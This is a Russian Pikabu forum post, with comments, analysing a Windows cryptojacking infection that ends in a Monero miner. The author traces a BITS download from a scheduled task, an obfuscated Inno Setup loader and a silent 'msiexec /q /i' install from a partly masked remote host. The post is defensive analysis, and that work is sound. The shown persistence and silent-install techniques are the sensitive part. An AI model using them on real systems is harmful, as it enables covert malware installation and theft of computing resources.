Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Информационная безопасность IT

1.4K постов25.5K подписчиков

Добавить пост

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

Вы смотрите срез комментариев. Показать все
512
DELETED
Автор поста оценил этот комментарий

Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса.

Это задержка в 5 сек. перед выполнением команды Del.

раскрыть ветку (146)
258
DELETED
Автор поста оценил этот комментарий

Спасибо, интересный факт

раскрыть ветку (132)
48
Автор поста оценил этот комментарий

Автозагрузку надо смотреть с помощью хотя бы autoruns.exe, а не через msconfig, в котором практически ничего нет.

раскрыть ветку (14)
14
Автор поста оценил этот комментарий
Также некоторые вирусы прячутся в планировщике задач. Хоть всё на свете из автозагрузки вычисти, дырявый предатель-планировщик в полночь обратно вернет.

Для этой всей темы еще есть замечательный китайский PCHunter (раньше назывался XueTr).

раскрыть ветку (3)
20
Автор поста оценил этот комментарий
Хуетр? А они могут в названия )
раскрыть ветку (1)
4
Автор поста оценил этот комментарий
3
Автор поста оценил этот комментарий

там и планировщик есть. причем видно даже те задачи, которые скрываются. китайскому софту не доверяю, сорян

13
Автор поста оценил этот комментарий
Статья для домохозяек же...
раскрыть ветку (7)
21
Автор поста оценил этот комментарий

да, сначала так и показалось. но когда "Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:"...

пысы особенно орнул с четвертого шага Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз.
декомпилировал фрагмент кода и ждал оригинальный текст программы? )

при этом человек не знает для чего пинг локалхоста в батнике.

раскрыть ветку (6)
21
Автор поста оценил этот комментарий

Домохозяйка-программист. Паскаль знает, а autoruns нет.

ещё комментарии
2
Автор поста оценил этот комментарий

согласен.. да и ключи реестра еще никто не отменял.. запуск через тот же explorer

раскрыть ветку (1)
6
Автор поста оценил этот комментарий

Ауторанс их все и показывает

142
Автор поста оценил этот комментарий

Pause нет в винде, вот так заменяют

раскрыть ветку (13)
67
Автор поста оценил этот комментарий

Есть, с Windows 7 есть команда timeout =)

раскрыть ветку (7)
76
Автор поста оценил этот комментарий

Отлично, спасибо

раскрыть ветку (6)
264
Автор поста оценил этот комментарий

Отлично, спасибо, пойду совершенствовать вирус)

ещё комментарии
17
Автор поста оценил этот комментарий

Это я загуглил, сам не знал, признаюсь откровенно =D Пытался через rundll32 и Sleep сделать, но не сработало. Видимо, запускается не в окне консоли.

1
Автор поста оценил этот комментарий

timeout /?

1
Автор поста оценил этот комментарий

pause ждет нажатия клавиши

Автор поста оценил этот комментарий

Чем команда sleep плоха?

раскрыть ветку (1)
Автор поста оценил этот комментарий

Тем, что ее нет из коробки.

Автор поста оценил этот комментарий
А sleep?
68
Автор поста оценил этот комментарий

Был такой антивирус бабушкина. Он тоже что-то пинговал, чтобы вызвать задержку, либо, чтобы скрипт не завершился - точно не вспомню. По-моему, он это для демонизации юзал.


Точно: он использовал ping mail.ru для задержки. Возможно, вы нашли вирус Бабушкина. Надо просканировать код на наличие строчки "Еби гусей".

раскрыть ветку (3)
22
Автор поста оценил этот комментарий

Майнер бабушкина, back to the batnik

раскрыть ветку (2)
2
Автор поста оценил этот комментарий

Да не, тут, типа как в фильмах про супергероев: пацана залупил хайп. И вот, он теперь умеет в Паскаль. А пинги, сука, оставляет. Рождение суперзлодея - бывшего фаната супергероев.

раскрыть ветку (1)
7
Автор поста оценил этот комментарий

Ну лан) не hello world и уже не стыдно миру показать.

15
Автор поста оценил этот комментарий
Спасибо, не подскажите дельный совет, я свой ПК обычно в гибернацию отправляю, но он из нее самопроизвольно просыпается, я уже убирал в ресурсах чтобы он от Клавы и мыши не просыпался, и гуглил что в cmd что-то прописывать надо. Но снова просыпания начались. Это может Майнер?
раскрыть ветку (63)
145
Автор поста оценил этот комментарий
Просто комп выспался
раскрыть ветку (1)
64
Автор поста оценил этот комментарий

и пошел на работу майнить

41
Автор поста оценил этот комментарий

После пробуждения в cmd введи


powercfg –lastwake
=Узнаешь кто последний вывел комп из сна.


powercfg –devicequery wake_armed

=Узнаешь кто имеет право будить комп.

раскрыть ветку (19)
1
Автор поста оценил этот комментарий

у меня почему-то ни то, ни то не работает (

хотя команда такая есть

раскрыть ветку (15)
5
Автор поста оценил этот комментарий

Руками набирай комманды, а не копи-пасть.

раскрыть ветку (1)
9
Автор поста оценил этот комментарий

ну щас, ага

Автор поста оценил этот комментарий

В смысле? Покажи скрин что пишут обе команды

раскрыть ветку (12)
5
Автор поста оценил этот комментарий

а. надо было писать заглавными

POWERCFG -DEVICEQUERY wake_armed

POWERCFG -LASTWAKE

раскрыть ветку (7)
1
Автор поста оценил этот комментарий

странно, у меня любыми проходит, пробовал на 7-ке и 10-ке

раскрыть ветку (6)
Автор поста оценил этот комментарий

Странно

раскрыть ветку (5)
Автор поста оценил этот комментарий

Проблему то нашёл?

раскрыть ветку (4)
3
Автор поста оценил этот комментарий

Чувак, что ты с ним сделал? Что делают эти команды? Последние его слова: "Странно..."

раскрыть ветку (2)
Автор поста оценил этот комментарий

у меня и не было, я так, посмотреть, на будущее

Автор поста оценил этот комментарий

да что показывать?

C:\Users\Anthon>powercfg -devicequery wake_armed

Неправильные параметры - используйте параметр "/?" для получения справки

C:\Users\Anthon>powercfg -lastwake

Неправильные параметры - используйте параметр "/?" для получения справки

винда 7 х64 макс

раскрыть ветку (3)
Автор поста оценил этот комментарий
Пробел после тире?!
раскрыть ветку (2)
1
Автор поста оценил этот комментарий
Это минус, не тире.
раскрыть ветку (1)
Автор поста оценил этот комментарий

Правый слэш используй вместо дефиса в команде

Автор поста оценил этот комментарий

Спасибо. Похожая проблема есть, тоже нужно глянуть.

Автор поста оценил этот комментарий

Ооо, спасибо большое.

А то уже всё перепробовал и всё никак не мог найти причину.

раскрыть ветку (1)
3
Автор поста оценил этот комментарий

так что было?

32
Автор поста оценил этот комментарий

Зайди в настройки "Электропитания" > Выбери текущий план > Доп настройки и отключи таймеры пробуждения

Иллюстрация к комментарию
раскрыть ветку (12)
7
Автор поста оценил этот комментарий

@FryOS

Если продолжает включаться - тогда зайди в BIOS и отключи пробуждение от клавиатуры/мыши/сети и т.д.

раскрыть ветку (10)
1
Автор поста оценил этот комментарий

У меня комп и гитарный комбик воткнуты в один удлинитель. Когда включаю комбик комп просыпается, подскажите это нормально?

раскрыть ветку (9)
6
Автор поста оценил этот комментарий

В BIOSe – Power state on power loose: переключить в OFF

раскрыть ветку (2)
4
Автор поста оценил этот комментарий

Спасибо, спрасил просто из интереса.

раскрыть ветку (1)
5
Автор поста оценил этот комментарий

О! Ещё кто-то пользуется авотаркой с заземлением ;D
Короче, эт намёк на причину, прям в твоей аватарке.
Поменяй фильтр сетевой.

2
Автор поста оценил этот комментарий

Нет, не нормально, да, у меня было что-то подобное, комп включался от рядом расположенного электроприбора. Помогло вышеупомянутое отключение в BIOSе.

Автор поста оценил этот комментарий
комик мощный? помеха может при включении по питанию пролетать. можно попробовать все заземлить. тогда проблема должна исчезнуть.
раскрыть ветку (4)
1
Автор поста оценил этот комментарий

Комбик 30w. спасибо за совет. Мне не мешает, так, из научного интереса спросил.

раскрыть ветку (3)
Автор поста оценил этот комментарий
это потребляемая?
раскрыть ветку (2)
1
Автор поста оценил этот комментарий

хз, честноговоря)

1
Автор поста оценил этот комментарий
Это выдаваемая динамиками мощность
Автор поста оценил этот комментарий

из сети кто-то постучался, и всех делов. проверь - отключи вафлю или шнурок "интернетный")

лечится вот так, как на картинке, или в биосе.

20
DELETED
Автор поста оценил этот комментарий

Не факт, может какие-то устройства типо флешек или сетевухи поднимают систему, подробнее здесь гляньте, есть пара дельных советов там: http://www.cyberforum.ru/windows8/thread1156201.html

раскрыть ветку (3)
2
Автор поста оценил этот комментарий
Всем спасибо. Буду пробовать. Вы замечательные.
Автор поста оценил этот комментарий

у меня сетевуха будила, причем из спящего режима, из гибернации при этом не просыпался.

раскрыть ветку (1)
DELETED
Автор поста оценил этот комментарий

Ну из гибернации и не должно т.к. сон это по сути отключение периферии, чаще всего даже просто дисплея и кулеров, а вот гибернация это выгружаются данные из оперативы на диск и отключается питание всей системы.

4
Автор поста оценил этот комментарий
У меня так было из за запланированной дефрагментации дисков, которые почему то стоят по умолчанию в 3:00, вроде. И именно из за этого включался тоже пк. Отключил - и перестал.
10
Автор поста оценил этот комментарий

В свойствах сетевой карты снять галку "разрешить управление питанием" или что то в этом духе. Форточек под рукой нет что бы точно посмотреть

2
Автор поста оценил этот комментарий

Подскажу. В Диспетчере устройств в свойствах сетевой карты на вкладке Управление электропитанием снять галочку с Разрешить этому устройству выводить пк из ждущего режима. Не благодари.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Я отблагодарю, спасибо. Но просто с полгода назад, я тоже это гуглил, и снял галку, вчера проверил она по прежнему снята, но включения продолжаются, буду пробовать и др советы.
2
Автор поста оценил этот комментарий

У меня было такое, ЧСХ, только зимой самопроизвольно включался. Я уж чего только не проверял, оказалось, что включается от статического электричества, да-да, не смейтесь! Влажность низкая в квартире, всё электрилизуется... когда встряхиваешь одеяло или, например, садишься на диван в синтетике - щёлк и просыпается!

3
Автор поста оценил этот комментарий

У меня сетевая карта будила, запретил ей просыпаться и всё.

Автор поста оценил этот комментарий

Если есть вафля-роутер и ты подключаешься к нету с мобилы или любым другим устройством, то это сетевуха будит твой комп. Как советовали ниже отключи пробуждение от неё.

раскрыть ветку (2)
Автор поста оценил этот комментарий

Ого, интересная теория.

Автор поста оценил этот комментарий
то это сетевуха будит твой комп

С чего бы это? Плюс ещё важно как роутер и комп подключены между собой

Автор поста оценил этот комментарий

Такая же проблема( ничего не помогает, ещё и перезагружается посреди ночи раз в неделю. Причём любые самовольные движняки с обновлениями и т.д. отключены. Поначалу думала дело в компе. Месяц назад подарили ноутбук. Так у него такие же приколюхи начались.

Автор поста оценил этот комментарий
Мне помогло отключение в биосе 1394 контроллер. Материнка асус. Тоже просыпался сам постоянно.
DELETED
Автор поста оценил этот комментарий
Комментарий удален. Причина: данный аккаунт был удалён
Автор поста оценил этот комментарий

А wakeup по LAN не отключал, если мышь и клаву отключил, может еще какое устройство по USB есть и его будит?

3
Автор поста оценил этот комментарий
Да обновление на форточку пришло, скорее всего, перезагрузи компьютер
раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Согласен, у меня время от времени просыпается для установки обновлений.

1
Автор поста оценил этот комментарий

У меня так было когда дисковод поломался. Второй случай - беспроводная мышь каким-то образом выводила из сна. Попробуй их проверить.

раскрыть ветку (1)
Автор поста оценил этот комментарий

С мышкой все супер, дисковода нет(

ещё комментарии
1
Автор поста оценил этот комментарий
Было у меня такое. Посмотри в журнале событий. При переходе в гибернацию почему то время сбрасывалось и батарейка биос тут не причем. Помогло обновление винды
DELETED
Автор поста оценил этот комментарий
Windows 10 себя так видет
3
Автор поста оценил этот комментарий

Ответь ньюфагу,если переустановить шиндоус,можно снести майнер или он в биосе?

раскрыть ветку (4)
9
Автор поста оценил этот комментарий

при первых признаках панической атаки  - ПЕРЕУСТНАНАВЛИВАЙ WINDOWS НЕМЕДЛЕННО

раскрыть ветку (3)
раскрыть ветку (2)
Автор поста оценил этот комментарий

мля думал тут способ лечения, спасибо, ребенок усрался от страха

раскрыть ветку (1)
Автор поста оценил этот комментарий

"Наши лучшие средства от запора - видео по копипастам с Двача!"

6
Автор поста оценил этот комментарий

Вопрос от человека, который совсем не в теме компьютерной безопасности. Вы назвали некоторые антивирусы "простенькими". Можно подробнее? Чего стоят самые популярные нынче антивирусы? Например, я пользуюсь Нод32. Он простенький?

раскрыть ветку (19)
18
Автор поста оценил этот комментарий

В число "простеньких" входят windows defender и пробные бесплатные версии таких антивирусов как avast. Почему "простенькие"? Они имеют небольшой набор функций, как правило достаточный для того, чтобы в сочетании с не лезущим куда попало пользователем защитить комп от вирусов. Впринципе, если использовать только лицензионный софт, не лазить по сомнительным сайтам и не зать на кнопку "получить" в окне, где написано "вы выиграли 1000000", то этого достаточно.


P.S. Мощный антивирус - не всегда хорошо влияет на компьютер. Пример - антивирус касперского

раскрыть ветку (16)
9
Автор поста оценил этот комментарий

Да не, каспер в последнее время неплох, даже на вёдрах. Если не считать его загоны с ammyy admin, которого он уже много лет считает суперпиздецстрашным вирусом, настолько, что роняет винду при немедленном лечении)

раскрыть ветку (7)
1
Автор поста оценил этот комментарий

Т.е. каспер - хороший антивирь? Стоит покупки? Тех же майнеров распознает?

раскрыть ветку (4)
9
Автор поста оценил этот комментарий

У меня каспер не видел два(!) майнера, а Malwarebytes нашел. Не реклама.

1
Автор поста оценил этот комментарий

Вот тут хз. Сами майнеры он считает чистыми, если я их сам скачал, насчёт скрытых установщиков - мне лично такие не попадались. Для покупки хороший вариант, я купил себе.

Против майнеров главное правило - не сидеть под админской учёткой)

Автор поста оценил этот комментарий

По опыту .нет идеальных антивирусов.Против" старых" вирусов помогают ,а новые залетают только так.

ещё комментарий
DELETED
Автор поста оценил этот комментарий

ну, AmmyAdmin тоже лоханулись- недавно в последней версии троян нашли.

раскрыть ветку (1)
Автор поста оценил этот комментарий

И это не единственная проблема. Там сама архитектура приложения кривая.

3
DELETED
Автор поста оценил этот комментарий

Я бы сказал, что делая все как сказано выше - даже простенького антивируса не надо. За последние 5 лет не одного вируса не поймал, хотя из защиты только параноидально настроенный роутер.

раскрыть ветку (5)
2
Автор поста оценил этот комментарий

Ваша система при желании ломается на 1-2-3 через любую свежую дыру в браузере. И роутер тут абсолютно не при чём. А тактика "Я не вижу угроз - значит их нет" - вообще без комментариев.

раскрыть ветку (4)
1
Автор поста оценил этот комментарий

Тут только безопасность в виде использования Linux, а то и FreeBSD, и то всегда есть микроскопический шанс найти новую критическую уязвимость, которой успеют воспользоваться(Heartbleed передаёт привет)

раскрыть ветку (1)
Автор поста оценил этот комментарий

Не существует безопасных систем. И под линукс, и под бсд существует масса атак.

1
DELETED
Автор поста оценил этот комментарий

При желании можно и пентагон взломать.

Вопрос в том, что даже если я словлю какую-то вирусню, то роутер как минимум не даст ей в сети ковыряться, а еще лучше - сообщит мне в логах, что что-то идет явно не так.


Защиты в виде головы на плечах более чем достаточно практически в 100% случаев.

раскрыть ветку (1)
Автор поста оценил этот комментарий

Роутер не разрешает исходящий трафик на 80 и 443 порты? Вы таки руками апррувите чейндж в белом списке на каждый сайт, cdn, etc...? Вам знакома техника со взломом доверенного веб-сервера и внедрением заряженного is? А dns-spoofing? И это ещё далеко не все способы поиметь самоуверенных "спецов".

1
Автор поста оценил этот комментарий

Я как-то вообще без антивируса справляюсь. Уже лет 6-7. И...ничего :с

Автор поста оценил этот комментарий
О, у меня вопрос как раз по win defender. У меня каждые полчаса примерно открывается его страница в браузере, а на ней тупо заглушка "купить этот домен", гугл ничего не говорит как эту хрень убрать, она меня уже бесит.
1
Автор поста оценил этот комментарий
Демо версии он имел в виду. Вероятно. А для более подробного объяснения, нужно лишь отправить смс
Автор поста оценил этот комментарий

+1 Кстати, Есет с обновлениями через "добрых людей" денег не кушает ;)))

Автор поста оценил этот комментарий

И каким же антивирем защищаться нам всем?

Автор поста оценил этот комментарий
Добрый день! А занимаетесь ли Вы "лечением" компьютеров на дому? В Москве? Как можно с Вами связаться?
раскрыть ветку (1)
Автор поста оценил этот комментарий

Чувак, будь я даже цыганом-конокрадом, я бы и то не доверил лечение своего компа биологу. Мы все знаем про москвонаёбщиков, по факту примерный прайс -штуки 2-5. От этого и отталкивайся, а этого дяденьку не слушай, он еще и сифилис в мазке материнской платы найдёт, и в usb-портах что-нибудь венерическое наанализирует, потом вообще не расплатишься.

ещё комментарии
32
DELETED
Автор поста оценил этот комментарий

Точнее, не 5, а 4 сек. Первый ping сразу выполняется.

раскрыть ветку (1)
7
Автор поста оценил этот комментарий

Ну тогда не 4, а 4.0... секунды, ведь пинг даже до локалхоста не моментальный ;)

7
Автор поста оценил этот комментарий
Ой а скажите что-нибудь по программистски?
раскрыть ветку (5)
10
Автор поста оценил этот комментарий

Я не отлыниваю, просто проект компилируется

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

В коде нет ошибок - это исключения.

2
DELETED
Автор поста оценил этот комментарий

May the source be with you!


Песня:

https://www.youtube.com/watch?v=zWZybFMQNqw

2
Автор поста оценил этот комментарий
Привет, мир.
1
Автор поста оценил этот комментарий

Cout << "нет";

2
Автор поста оценил этот комментарий

а вот и автор майнера подъехал)

3
DELETED
Автор поста оценил этот комментарий
Комментарий удален. Причина: данный аккаунт был удалён
6
Автор поста оценил этот комментарий

во 1х апдейты спасут мир.. ибо кто не залатался, я не виноват.

во 2х в cmd ну нету задержек посему приходится пинговать

в 3х кастрирование прав пользователя спасет ибо вот так вот.. )

в 4х колеги админы. Неужели мы перестали мониторить трафик пользователей?

пс..

connectivitycheck.gstatic.com/generate_204

а через вот так было бы не плохо

раскрыть ветку (2)
8
Автор поста оценил этот комментарий
Он сказал про домашний компьютер.
раскрыть ветку (1)
Автор поста оценил этот комментарий

И что? Кастрирование прав пользователя и для домашнего компьютера верно. Считаю это основой безопасности. Если работаю под виндой то стараюсь создавать урезанного пользователя и сидеть, надо админские права, он спросит. В линуксе вообще даже кеды от рута хер запустишь сразу, поэтому там так и так надо пользователя создавать.

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку